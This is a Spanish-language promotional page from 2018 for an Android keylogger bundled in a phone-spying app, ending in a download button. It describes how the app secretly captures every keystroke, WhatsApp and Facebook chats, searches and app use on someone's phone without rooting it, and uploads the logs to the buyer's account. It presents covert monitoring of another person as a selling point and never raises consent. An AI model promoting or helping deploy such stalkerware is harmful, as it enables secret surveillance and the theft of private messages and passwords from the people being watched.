Saltar al contenido

Keylogger para Android

marzo 15, 2018
keylogger android

Keylogger Android

 

Que es un Keylogger?

Por definición, un Keylogger es un software “registrador” o grabador de cada pulsación de tecla. Ampliando un poco mas, se trata de una aplicación que se instala en una computadora o dispositivo y luego registra todas las pulsaciones de tecla. Todo lo que se escribe se graba y almacena para su posterior análisis. Por supuesto, durante los últimos diez años, cualquier cosa llamada computador incluye los teléfonos inteligentes de bolsillo. Aquí sólo nos enfocamos los teléfonos inteligentes y podemos ignorar las soluciones de hardware que fueron alguna vez más comunes en los computadores de escritorio.

 

Como funciona Keylogger Android?

Cada pulsación realizada en el celular, es registrada por la aplicación, todo lo que se escribe es registrado incluso la aplicación activa en donde se esta escribiendo. Toda esta información estará disponible para usted casi de forma instantánea.  Todo evento o aplicación abierta también es registrada. Los datos recogidos, se almacenan ordenados por fecha y hora para una búsqueda rápida.  Usted tendrá la opción de seleccionar un determinado día, y ver todo lo que se hizo y se escribió desde el teléfono para ese respectivo día.

 

Requisitos para usar Keylogger Android?

Solo debes instalar y activar la aplicación para espiar celular. Nada mas!, no es necesario ninguna configuración adicional, tampoco es necesario que el dispositivo este root.  El Keylogger para Android comenzara a funcionar de forma inmediata y a enviar la información a su cuenta de usuario. Muchas aplicaciones similares requieren rootear el dispositivo para que esta característica funcione, sin embargo, con nuestra aplicación, usted puede usar el Keylogger Android sin necesidad de rootear el celular.

 

Importancia del Keylogger en Android

Esta característica es muy potente, debido a que absolutamente todo lo que se hace o escribe en el celular queda registrado. Conversaciones de Whatsapp, Facebook, búsquedas en Google, etc.  La información registrada es muy extensa y completa, es por eso que usted puede filtrar la información según una determinada fecha.

 

Cada cuanto se actualiza los registros del Keylogger?

La frecuencia de actualización depende de la intensidad de uso del dispositivo, cuanto mas se use y mas información se registre, mas rápido se actualiza y usted podrá verlo en su cuenta de usuario. En promedio, es común que la información se actualiza 10 veces al día.

[ia_button id=”button_20″ size=”small” solid=”1″ link=”https://es.catwatchful.com/main/download/” icon=”” arrow=”1″ target=”” color=”#” css_animation=”” animation_delay=””]Descargar ahora![/ia_button]

 

Vea un vídeo tutorial de como instalar la aplicación espiar celular, que le permitirá usar el Keylogger Android.